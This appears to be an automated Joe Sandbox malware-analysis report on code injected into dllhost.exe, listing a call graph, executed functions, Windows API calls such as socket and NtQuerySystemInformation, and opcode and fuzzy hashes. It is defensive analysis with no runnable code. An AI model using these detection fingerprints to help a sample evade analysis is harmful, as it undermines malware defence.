1fc54089ac6 13884->13885 13886 1fc540880cc free 13885->13886 13887 1fc54089af6 13885->13887 13886->13887 13887->13883 13940 1fc54085540 13941 1fc5408555e 13940->13941 13942 1fc540853d4 free 13941->13942 13943 1fc5408558a 13941->13943 13942->13943 13759 1fc54082874 13760 1fc5408288e 13759->13760 13761 1fc54082898 13760->13761 13762 1fc54082893 LoadLibraryA 13760->13762 13762->13761 13993 1fc54085454 13994 1fc540854c9 13993->13994 13996 1fc5408546a 13993->13996 13995 1fc540853d4 free 13994->13995 13994->13996 13995->13996 13944 1fc540a9554 13945 1fc540a9578 13944->13945 13946 1fc540a955e 13944->13946 13946->13945 13948 1fc540a7fe0 13946->13948 13951 1fc540a7ef0 13948->13951 13950 1fc540a8011 13950->13945 13952 1fc540a7f14 socket 13951->13952 13953 1fc540a7f2c 13951->13953 13952->13953 13954 1fc540a7f47 13952->13954 13953->13950 13954->13953 13955 1fc540a7b00 2 API calls 13954->13955 13955->13953 13763 1fc540830d8 13764 1fc5408310b 13763->13764 13766 1fc5408311d 13764->13766 13767 1fc540846c4 13764->13767 13768 1fc540846d6 13767->13768 13770 1fc540846ef 13768->13770 13771 1fc54084634 13768->13771 13770->13766 13772 1fc5408464f 13771->13772 13774 1fc54084660 13772->13774 13775 1fc54088110 13772->13775 13774->13770 13776 1fc54088119 13775->13776 13779 1fc540881d2 13775->13779 13777 1fc540881a3 13776->13777 13781 1fc540880cc 13776->13781 13778 1fc540880cc free 13777->13778 13777->13779 13778->13779 13779->13774 13782 1fc540880d1 13781->13782 13783 1fc540880f1 13781->13783 13782->13783 13784 1fc540880e7 free 13782->13784 13783->13777 13784->13783 13785 1fc540880cc 13786 1fc540880d1 13785->13786 13787 1fc540880f1 13785->13787 13786->13787 13788 1fc540880e7 free 13786->13788 13788->13787 13892 1fc5408330c 13893 1fc5408331e 13892->13893 13894 1fc54083378 13892->13894 13893->13894 13896 1fc54085774 13893->13896 13897 1fc54085779 13896->13897 13899 1fc5408579b 13896->13899 13897->13899 13900 1fc540855e0 13897->13900 13899->13893 13901 1fc5408560c 13900->13901 13905 1fc540856b1 13901->13905 13906 1fc54084918 13901->13906 13903 1fc54085697 13903->13905 13910 1fc540853d4 13903->13910 13905->13899 13908 1fc5408493e 13906->13908 13907 1fc54084946 13907->13903 13908->13907 13909 1fc540846c4 free 13908->13909 13909->13907 13911 1fc540853d9 13910->13911 13912 1fc54085416 13910->13912 13911->13912 13913 1fc540846c4 free 13911->13913 13912->13905 13913->13912 13914 1fc54082f2c 13917 1fc54082f46 13914->13917 13918 1fc54083043 13914->13918 13915 1fc540846c4 free 13916 1fc54083041 13915->13916 13917->13916 13917->13918 13919 1fc54082fc9 13917->13919 13918->13915 13919->13916 13921 1fc54085ce8 13919->13921 13925 1fc54085d86 13921->13925 13926 1fc54085d04 13921->13926 13922 1fc54085d81 13922->13916 13923 1fc54085d79 13924 1fc540846c4 free 13923->13924 13924->13922 13925->13922 13929 1fc5408587c 13925->13929 13926->13923 13927 1fc540853d4 free 13926->13927 13927->13926 13930 1fc540858c3 13929->13930 13934 1fc5408594e 13929->13934 13931 1fc540858cc 13930->13931 13932 1fc54085b2c 13930->13932 13931->13934 13935 1fc540853d4 free 13931->13935 13933 1fc540855e0 free 13932->13933 13932->13934 13933->13934 13934->13925 13935->13934 13956 1fc54089f6c 13957 1fc54089f86 13956->13957 13961 1fc54089fab 13956->13961 13958 1fc54089ef4 free 13957->13958 13957->13961 13959 1fc54089f95 13958->13959 13960 1fc54087fcc free 13959->13960 13959->13961 13960->13961 13796 1fc54082690 13799 1fc540828d4 13796->13799 13800 1fc540826a2 13799->13800 13801 1fc540828dd 13799->13801 13801->13800 13802 1fc54082944 SetErrorMode 13801->13802 13803 1fc54082955 13802->13803 13805 1fc54083970 13803->13805 13806 1fc54083991 13805->13806 13812 1fc54083ae9 13806->13812 13813 1fc54083544 13806->13813 13809 1fc540839c2 13809->13812 13817 1fc5408376c 13809->13817 13810 1fc54083a5e 13811 1fc54083ad3 NtQuerySystemInformation 13810->13811 13810->13812 13811->13812 13812->13800 13815 1fc5408356d 13813->13815 13814 1fc54083637 GetVolumeInformationW 13816 1fc54083672 13814->13816 13815->13814 13815->13816 13816->13809 13818 1fc5408379e 13817->13818 13819 1fc5408387e CreateFileMappingW 13818->13819 13820 1fc540838b8 MapViewOfFile 13819->13820 13821 1fc540838db 13819->13821 13820->13821 13821->13810 13826 1fc540a7ef0 13827 1fc540a7f14 socket 13826->13827 13828 1fc540a7f2c 13826->13828 13827->13828 13829 1fc540a7f47 13827->13829 13829->13828 13831 1fc540a7b00 13829->13831 13832 1fc540a7b32 13831->13832 13833 1fc540a7b55 CreateIoCompletionPort 13832->13833 13835 1fc540a7b3d 13832->13835 13834 1fc540a7b6d 13833->13834 13834->13835 13836 1fc540a7ba2 SetFileCompletionNotificationModes 13834->13836 13835->13828 13836->13835 13888 1fc54082ad2 13889 1fc54082ae7 13888->13889 13890 1fc54082b07 13889->13890 13891 1fc540846c4 free 13889->13891 13891->13890

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 000001FC54083970 Relevance: 1.8, APIs: 1, Instructions: 269nativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000019.00000002.2945883593.000001FC54080000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC54080000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_25_2_1fc54080000_dllhost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Information$QuerySystemVolume
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2187445334-0
                                                                                                                                                                                          • Opcode ID: e92f52f04fafdb8c987bb29090aa65ae1428b1b1263f5fb89cc43cd6609f3fd8
                                                                                                                                                                                          • Instruction ID: 273fcc2f42e0db2696127c73d9f4e0b4d938e4400b05487732174c8e5e782806
                                                                                                                                                                                          • Opcode Fuzzy Hash: e92f52f04fafdb8c987bb29090aa65ae1428b1b1263f5fb89cc43cd6609f3fd8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 04916131318E0D4FE795EB24C9697FAB7E1FBA4301F104A3A945BC31A1EE34E5459781
                                                                                                                                                                                          Function 000001FC54082B70 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 240 1fc54082b70-1fc54082c61 call 1fc54083c58 call 1fc54081030 call 1fc54081914 call 1fc54081488 call 1fc540816a0 call 1fc54081488 call 1fc540811dc call 1fc54081488 call 1fc540811dc call 1fc54081488 call 1fc540811dc 264 1fc54082e66-1fc54082e81 call 1fc54081488 call 1fc540817dc 240->264 265 1fc54082c67-1fc54082c6f call 1fc540b2856 240->265 273 1fc54082e86-1fc54082ea2 264->273 268 1fc54082c74-1fc54082c79 265->268 270 1fc54082c7b-1fc54082c7e 268->270 271 1fc54082c80-1fc54082c9c 268->271 270->271 274 1fc54082cad-1fc54082caf 270->274 271->274 285 1fc54082c9e-1fc54082cab call 1fc540b2856 271->285 282 1fc54082ea4-1fc54082ee4 call 1fc54084b34 call 1fc54085ee6 273->282 283 1fc54082ee7-1fc54082efc call 1fc54083dc4 273->283 275 1fc54082cc5-1fc54082cc8 274->275 276 1fc54082cb1-1fc54082cb4 274->276 275->264 280 1fc54082cce-1fc54082cd1 275->280 276->264 279 1fc54082cba-1fc54082cc3 276->279 279->275 284 1fc54082cd3-1fc54082cda 280->284 282->283 289 1fc54082cdc 284->289 290 1fc54082cde-1fc54082ce4 284->290 285->274 289->290 290->284 294 1fc54082ce6-1fc54082d07 call 1fc54081488 call 1fc540817dc 290->294 302 1fc54082d09-1fc54082d10 294->302 303 1fc54082d16-1fc54082e4a call 1fc54081914 call 1fc54081488 call 1fc54085eec call 1fc54081488 * 2 call 1fc54085eec call 1fc54081488 * 2 call 1fc54085eec call 1fc54081488 * 2 call 1fc54085eec call 1fc54081488 * 2 call 1fc540816a0 call 1fc54081488 call 1fc54085eec call 1fc54081488 302->303 304 1fc54082e4f-1fc54082e55 302->304 303->304 304->302 306 1fc54082e5b-1fc54082e64 304->306 306->273
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000019.00000002.2945883593.000001FC54080000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC54080000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_25_2_1fc54080000_dllhost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 77fd5a4bbab4cc85a686b71583c3746bb737b9934f72eb7050730acdf8cf3daf
                                                                                                                                                                                          • Instruction ID: deaeb81cb1095e3110654f3fee5322937e772435c8a8aab43f1b7a515e5b9e9c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 77fd5a4bbab4cc85a686b71583c3746bb737b9934f72eb7050730acdf8cf3daf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 18B11335314A0D4BE746EB14CAA1AEBB3E1FBE4344F50463DA48BC71A6DE24F5099BC1
                                                                                                                                                                                          Function 000001FC540A6F3C Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000019.00000002.2945883593.000001FC54080000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC54080000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_25_2_1fc54080000_dllhost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: socket$ErrorModegetsockopt
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 552242919-0
                                                                                                                                                                                          • Opcode ID: 5311ec3011ded2eede0a7d2498efd547664f48dd7a92f4cf7cf32dea49d33346
                                                                                                                                                                                          • Instruction ID: 3cacfccfa633da1e0e238e16e09c7b6c3ecbd9b7690f913251153a6bf4d8e7d1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5311ec3011ded2eede0a7d2498efd547664f48dd7a92f4cf7cf32dea49d33346
                                                                                                                                                                                          • Instruction Fuzzy Hash: 474159707187498FE748EF28D8999A9B7E1FB99300F50862EE047C32E1DF389504DB91
                                                                                                                                                                                          Function 000001FC5408376C Relevance: 3.2, APIs: 2, Instructions: 176fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000019.00000002.2945883593.000001FC54080000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC54080000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_25_2_1fc54080000_dllhost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CreateMappingView
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3452162329-0
                                                                                                                                                                                          • Opcode ID: 129d2077c0dcf1c5c8194996cfac5c2ad39c6d887897e6f38c829ad1dd2edd25
                                                                                                                                                                                          • Instruction ID: e989d651806dd33fd5494c3c41d99cfed583310876e603153729a67e412df385
                                                                                                                                                                                          • Opcode Fuzzy Hash: 129d2077c0dcf1c5c8194996cfac5c2ad39c6d887897e6f38c829ad1dd2edd25
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5251823161CB898BD769EB24C8967FAB7E0FBD4301F10452FE4DAC2191DE34A5098B92
                                                                                                                                                                                          Function 000001FC540A7B00 Relevance: 3.1, APIs: 2, Instructions: 117COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000019.00000002.2945883593.000001FC54080000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC54080000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_25_2_1fc54080000_dllhost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3755109111-0
                                                                                                                                                                                          • Opcode ID: 1a7c7af7fbac319b5ac74e973487f80961a512197179ac17f28a09199c0ed714
                                                                                                                                                                                          • Instruction ID: 9c744054a8e49fa9fac3351c0ae13975d9f435d01a7d205e103b7c414af94eb9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a7c7af7fbac319b5ac74e973487f80961a512197179ac17f28a09199c0ed714
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F313A3032450E4FFB989B2999A43B9B2D6F7D8315F70407AE807C31A3DB25EC4996C1
                                                                                                                                                                                          Function 000001FC54083544 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000019.00000002.2945883593.000001FC54080000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC54080000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_25_2_1fc54080000_dllhost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                                          • Opcode ID: 71a7f780ae9fe7526399642dc629586b1db88638b38b934ddd42604476fc42bb
                                                                                                                                                                                          • Instruction ID: 17b3f4cd71d7bd12e9d06e0844768556eb6950d7d3877385fd6a836b4421bb24
                                                                                                                                                                                          • Opcode Fuzzy Hash: 71a7f780ae9fe7526399642dc629586b1db88638b38b934ddd42604476fc42bb
                                                                                                                                                                                          • Instruction Fuzzy Hash: CC51747121C7898BD369EF24C9A56EBF7E1FBD4300F504A3EA0CAC21A1DF7491059B82
                                                                                                                                                                                          Function 000001FC540A7EF0 Relevance: 1.6, APIs: 1, Instructions: 93networkCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000019.00000002.2945883593.000001FC54080000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC54080000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_25_2_1fc54080000_dllhost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: socket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 98920635-0
                                                                                                                                                                                          • Opcode ID: 447b7a408af3f987d6011d6f51ca6bdc25f1dc750359ee3063f4803dadd2e1cc
                                                                                                                                                                                          • Instruction ID: c7e750d94104df0e3e254359fae83d14e130dc17cc062277cb3da62a10a1fb3a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 447b7a408af3f987d6011d6f51ca6bdc25f1dc750359ee3063f4803dadd2e1cc
                                                                                                                                                                                          • Instruction Fuzzy Hash: BD213B303145094FEB48AB39989D7B973D2FB84325F20467AE82AC72E1DF24DC0596D1
                                                                                                                                                                                          Function 000001FC540828D4 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000019.00000002.2945883593.000001FC54080000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC54080000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_25_2_1fc54080000_dllhost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                          • Opcode ID: 33ec6ddaf9085df90f8e5865b7bf906381379c38ccf4d9984dbe8e39deaa4d69
                                                                                                                                                                                          • Instruction ID: cec5b65c89f661d368e76ab8adcd024a1c13b3341b7d9d0227bffcac7508f618
                                                                                                                                                                                          • Opcode Fuzzy Hash: 33ec6ddaf9085df90f8e5865b7bf906381379c38ccf4d9984dbe8e39deaa4d69
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25014430314A0E0AEF5DB3749B753FDA3D6EBE5310F64017D6846D31E2DE18E9096681
                                                                                                                                                                                          Function 000001FC540828A0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000019.00000002.2945883593.000001FC54080000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC54080000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_25_2_1fc54080000_dllhost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressCallerProc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2663294120-0
                                                                                                                                                                                          • Opcode ID: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
                                                                                                                                                                                          • Instruction ID: 4560d07507da0aaf8f5fd06d5ed46a3979fb3a89c6b9446172c7cc5bd0d46ba6
                                                                                                                                                                                          • Opcode Fuzzy Hash: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
                                                                                                                                                                                          • Instruction Fuzzy Hash: C0E0C221714C0E0BABA861AE259C6B692C6D7EC372714027BE81CC32A5ED10CC4503D0
                                                                                                                                                                                          Function 000001FC54082874 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 225 1fc54082874-1fc54082891 call 1fc54081994 228 1fc54082898-1fc5408289e 225->228 229 1fc54082893-1fc54082896 LoadLibraryA 225->229 229->228
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000019.00000002.2945883593.000001FC54080000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC54080000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_25_2_1fc54080000_dllhost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                          • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                                                          • Instruction ID: e7141ff759f4fd6efb6875b4fea77f74c23183e3aa830f606c111c125076de42
                                                                                                                                                                                          • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FD0A720321D0F1BEB4C633D1EA43B555C5E7DC325F60113EB809C2285DD58CC990340
                                                                                                                                                                                          Function 000001FC540880CC Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 230 1fc540880cc-1fc540880cf 231 1fc5408810d 230->231 232 1fc540880d1-1fc540880e0 230->232 233 1fc540880f1-1fc5408810c call 1fc5408ad2c 232->233 234 1fc540880e2-1fc540880eb call 1fc54090e88 free 232->234 233->231 234->233
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • free.MSVCRT(?,?,?,?,?,?,?,000001FC540881D2,?,?,?,?,?,?,?,000001FC54084660), ref: 000001FC540880EB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000019.00000002.2945883593.000001FC54080000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC54080000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_25_2_1fc54080000_dllhost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                          • Opcode ID: 3c17a6e6e70628ba888634de89261c78aecf94ca69ab89447a007bc2b199894c
                                                                                                                                                                                          • Instruction ID: 0536dfdd17506c245620b6d98ebab7948f596f7a18294f316e0191f2917d88da
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c17a6e6e70628ba888634de89261c78aecf94ca69ab89447a007bc2b199894c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 10E01235311D0E4BFF98AB6586B4B757395EB98302F6000686806C26A3CE55EC96D7C0